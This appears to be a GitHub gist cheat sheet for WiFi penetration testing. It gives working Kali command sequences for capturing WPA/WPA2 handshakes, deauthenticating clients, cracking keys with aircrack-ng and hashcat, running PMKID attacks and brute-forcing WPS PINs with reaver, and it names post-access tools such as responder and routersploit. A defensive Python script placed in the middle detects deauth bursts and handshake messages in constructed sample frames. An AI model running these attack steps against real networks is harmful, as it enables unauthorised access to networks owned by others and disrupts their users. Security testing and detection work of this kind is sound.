@faisalfs10x
Last active May 20, 2023 06:39
WiFi assessment notes

WiFi-Pentest-Cheat-Sheet

Repo: https://github.com/faisalfs10x/WiFi-Pentest-Cheat-Sheet

Useful terms/tools:
    airmon-ng - enable/disable monitor mode on wireless interfaces
    aireplay-ng - inject packets into a wireless network (e.g. deauthentication attacks)
    airodump-ng - wireless packet capture tool for raw 802.11 frames
    aircrack-ng - an 802.11 WEP / WPA-PSK key cracker
    wash - WiFi Protected Setup (WPS) scan tool
    reaver - WPS PIN cracker/brute-forcer

    airodump-ng --bssid = AP MAC address
    airodump-ng --essid = AP name (SSID)
    airodump-ng -c = channel to listen (focus) on
    aireplay-ng -a = AP MAC address
    aireplay-ng -c = client MAC address

    [C] = compulsory step
    [O] = optional step
    [O-1], [O-2] = alternatives, run either one

WPA Attack

[C] Kill all possible programs that could interfere with the wireless card.
kali $ sudo airmon-ng check kill
[C] Check injection capability (the interface must already be in monitor mode for this test)
kali $ sudo aireplay-ng --test wlan0
[C] Start monitor mode
[C] kali $ sudo airmon-ng start wlan0
[O] kali $ sudo airmon-ng start wlan0 8 #put wlan0 into monitor mode on a specified channel (here channel 8)

[O] kali $ sudo ifconfig wlan0 down && sudo iwconfig wlan0 mode monitor && sudo ifconfig wlan0 up
[O] kali $ sudo airmon-ng    (or: iwconfig)   #verify that the interface is in monitor mode
[C] Scan for all nearby WiFi networks and note the target AP's BSSID and channel
kali $ sudo airodump-ng wlan0 -a --wps
[O] List the clients of the selected WiFi network
[C] kali $ sudo airodump-ng wlan0 -a --channel 11 --bssid A6:91:A8:02:01:9D
[O] kali $ sudo airodump-ng wlan0 -a --channel 11 --essid 'starbuxk-AP'
[C] Open a 1st terminal - monitor the target network and capture the WPA/WPA2 4-way handshake. Wait until 'WPA handshake' or 'PMKID found' appears in the airodump-ng header line (-w sets the capture file prefix, so this writes starbuxk-01.cap)
kali $ sudo airodump-ng wlan0 -a -w starbuxk --channel 11 --bssid A6:91:A8:02:01:9D
[C] Open a 2nd terminal - deauthentication attack: kick the target client off so it reconnects and sends a fresh handshake. (-a = AP MAC address, -c = client MAC address)
kali $ sudo aireplay-ng wlan0 --deauth 3 -a A6:91:A8:02:01:9D -c 0C:DD:24:9F:F1:91
[O] Check whether a handshake was captured - make sure aircrack-ng reports 1 WPA handshake (or a PMKID) for the target network
kali $ aircrack-ng starbuxk-01.cap
[O] Analyse in Wireshark
kali $ wireshark starbuxk-01.cap
Wireshark display filter 'eapol' shows the 4-way handshake (EAPOL-Key) messages
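The two things this part of the procedure relies on, the deauthentication burst and the EAPOL 4-way handshake it provokes, are both easy to recognise in a capture, and a wireless IDS alerts on exactly the first of them. The following Python script is an added example, not part of this gist or of the aircrack-ng suite: it parses raw 802.11 frames (radiotap header already stripped), flags any transmitter whose deauth/disassoc frames reach a threshold inside a one-second window (window and threshold are assumed values, not a standard), and reports which of the four handshake messages were seen per AP/client pair, which is what aircrack-ng's handshake count and the Wireshark 'eapol' filter tell you. The frames are constructed inline (not real traffic) using the BSSID and client MAC from the commands above, and the message classification uses the Key Information Ack/MIC/Install/Secure bits, the standard way to tell M1..M4 apart.

```python
"""Triage a list of raw 802.11 frames: spot deauthentication bursts and check
whether a complete WPA/WPA2 4-way handshake (EAPOL-Key M1..M4) was captured."""
import struct
from collections import defaultdict

# LLC/SNAP header that precedes an EAPOL (EtherType 0x888E) payload in a data frame
LLC_SNAP_EAPOL = bytes.fromhex("aaaa03000000888e")


def mac(raw6):
    return ":".join(f"{b:02x}" for b in raw6)


def parse_frame(raw):
    """Parse the 802.11 MAC header (radiotap already stripped). Returns None if truncated."""
    if len(raw) < 24:
        return None
    fc0, fc1 = raw[0], raw[1]
    ftype, subtype = (fc0 >> 2) & 0x3, fc0 >> 4
    hdr = 24
    if ftype == 2 and subtype & 0x08:   # QoS data frames carry a 2-byte QoS Control field
        hdr += 2
    if (fc1 & 0x03) == 0x03:            # To-DS + From-DS (WDS) frames carry a 4th address
        hdr += 6
    return {"type": ftype, "subtype": subtype, "addr1": mac(raw[4:10]),
            "addr2": mac(raw[10:16]), "addr3": mac(raw[16:22]), "body": raw[hdr:]}


def deauth_bursts(frames, window=1.0, threshold=10):
    """frames: list of (timestamp_seconds, raw_bytes).
    Returns {transmitter_mac: peak count} for transmitters whose deauth/disassoc
    frames reach `threshold` within any `window`-second span (assumed IDS rule)."""
    stamps = defaultdict(list)
    for ts, raw in frames:
        f = parse_frame(raw)
        if f and f["type"] == 0 and f["subtype"] in (10, 12):   # 10 = disassoc, 12 = deauth
            stamps[f["addr2"]].append(ts)
    flagged = {}
    for src, times in stamps.items():
        times.sort()
        peak = lo = 0
        for hi, t in enumerate(times):          # sliding window over sorted timestamps
            while t - times[lo] > window:
                lo += 1
            peak = max(peak, hi - lo + 1)
        if peak >= threshold:
            flagged[src] = peak
    return flagged


def eapol_message_number(body):
    """Classify an EAPOL-Key payload as 4-way handshake message 1..4, else None."""
    if not body.startswith(LLC_SNAP_EAPOL) or len(body) < 15:
        return None
    eapol = body[8:]
    if eapol[1] != 3:                       # EAPOL packet type 3 = EAPOL-Key
        return None
    key_info = struct.unpack(">H", eapol[5:7])[0]   # after version, type, length, descriptor type
    ack, mic = key_info & 0x0080, key_info & 0x0100
    install, secure = key_info & 0x0040, key_info & 0x0200
    if ack and not mic:
        return 1                            # AP -> STA: ANonce
    if ack and mic and install:
        return 3                            # AP -> STA: ANonce again, GTK, MIC
    if mic and not ack:
        return 4 if secure else 2           # STA -> AP: M2 carries SNonce, M4 only confirms
    return None


def handshake_status(frames):
    """Returns {(mac_a, mac_b): [message numbers seen]} per AP/client pair.
    aircrack-ng counts a usable handshake once it has M2 plus M1 or M3."""
    seen = defaultdict(set)
    for _, raw in frames:
        f = parse_frame(raw)
        if f and f["type"] == 2:            # EAPOL travels in data frames
            n = eapol_message_number(f["body"])
            if n:
                seen[tuple(sorted((f["addr1"], f["addr2"])))].add(n)
    return {pair: sorted(nums) for pair, nums in seen.items()}


# --- constructed sample capture (not real traffic) using the MACs from the commands above ---
AP = bytes.fromhex("a691a802019d")      # BSSID A6:91:A8:02:01:9D
STA = bytes.fromhex("0cdd249ff191")     # client 0C:DD:24:9F:F1:91


def build_frame(fc0, fc1, addr1, addr2, addr3, body):
    return bytes([fc0, fc1]) + b"\x00\x00" + addr1 + addr2 + addr3 + b"\x00\x00" + body


def eapol_key(key_info):
    # EAPOL v2, type 3 (Key), RSN descriptor type 2, then the remaining 92 key-descriptor
    # bytes (replay counter, nonce, MIC, ...) zeroed since only Key Information matters here
    desc = bytes([2]) + struct.pack(">H", key_info) + bytes(92)
    return LLC_SNAP_EAPOL + bytes([2, 3]) + struct.pack(">H", len(desc)) + desc


SAMPLE = [(i * 0.05, build_frame(0xC0, 0x00, STA, AP, AP, b"\x07\x00"))  # 20 deauths in 1 s
          for i in range(20)]
SAMPLE += [
    (2.0, build_frame(0x08, 0x02, STA, AP, AP, eapol_key(0x008A))),  # M1  (From-DS)
    (2.1, build_frame(0x08, 0x01, AP, STA, AP, eapol_key(0x010A))),  # M2  (To-DS)
    (2.2, build_frame(0x08, 0x02, STA, AP, AP, eapol_key(0x13CA))),  # M3
    (2.3, build_frame(0x08, 0x01, AP, STA, AP, eapol_key(0x030A))),  # M4
]

if __name__ == "__main__":
    print("deauth bursts:", deauth_bursts(SAMPLE))
    print("handshakes:", handshake_status(SAMPLE))
```

On the sample data the script reports the AP's MAC as the source of a 20-frame deauth burst (a client sending these is unusual and spoofed AP-sourced deauths are the common case, so the transmitter address is what an IDS keys on) and a complete [1, 2, 3, 4] handshake for the AP/client pair. Feeding it real frames only requires stripping the radiotap header from each packet before calling parse_frame.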
[C] Stop monitor mode
kali $ sudo airmon-ng stop wlan0
kali $ sudo ifconfig wlan0 down && sudo iwconfig wlan0 mode managed && sudo ifconfig wlan0 up
kali $ sudo systemctl restart NetworkManager #restart NetworkManager so the card can connect to WiFi again
[C] Crack without GPU - slow ;(
kali $ aircrack-ng starbuxk-01.cap -w /usr/share/wordlists/rockyou.txt
[O] Crack with GPU - needs the GPU driver installed; recommended to run on Windows - fast ;)
kali $ sudo apt install hcxtools
kali $ hcxpcapngtool starbuxk-01.cap -o starbuxk.hc22000 #convert the capture to hashcat's 22000 format

[O-1] windows $ hashcat.exe -O --force -a 0 -w 3 -m 22000 starbuxk.hc22000 rockyou.txt -r .\rules\dive.rule --session=wifi-cracking #dictionary attack with rules, feasible run time

[O-2] windows $ hashcat.exe -O --force -a 3 -w 3 -m 22000 starbuxk.hc22000 ?a?a?a?a?a?a?a?a?a --session=wifi-cracking #mask (brute-force) attack over 9 printable characters; only with a very powerful GPU, takes an extremely long time
[O] Connect to WiFi
kali $ nmcli d wifi connect starbuxk-AP password wireless01    

PMKID Attack - Crack the WPA/WPA2 pre-shared key from a captured PMKID, without deauthenticating any client.

[C] Install the required tool and start collecting PMKIDs
kali $ sudo apt-get update && sudo apt-get -y install hcxtools
kali $ sudo hcxdumptool --enable_status=1 -o hcxdumptool_results.cap -i wlan0 #capture PMKIDs from all nearby networks
kali $ hcxpcaptool hcxdumptool_results.cap -k hashes.txt #older hcxtools; current releases ship hcxpcapngtool instead, whose -o output (as in the WPA section) is the 22000 format hashcat expects
windows $ hashcat.exe -m 22000 -a 0 --session=cracking --force --status -O -o hashcat_results.txt hashes.txt rockyou.txt #dictionary attack against the PMKID hashes
[O] Once you have access to a WiFi network, consider running the following Kali tools, and make sure you know what you are doing ;):
Routersploit against the router to check for known vulnerabilities
yersinia -G
responder -wF -I 192.168.X.X
wireshark

WPS Pin Attack

[C] Note the target's BSSID and channel
kali $ sudo airmon-ng start wlan0 #start monitor mode
kali $ sudo wash -a -i wlan0
[C] In new terminal 1
kali $ sudo reaver --bssid C0:C9:E3:F8:2F:82 --channel 2 --interface wlan0 -vvv --no-associate
[C] In new terminal 2
kali $ sudo aireplay-ng --fakeauth 30 -a C0:C9:E3:F8:2F:82 -h 00-C0-CA-92-7B-03 wlan0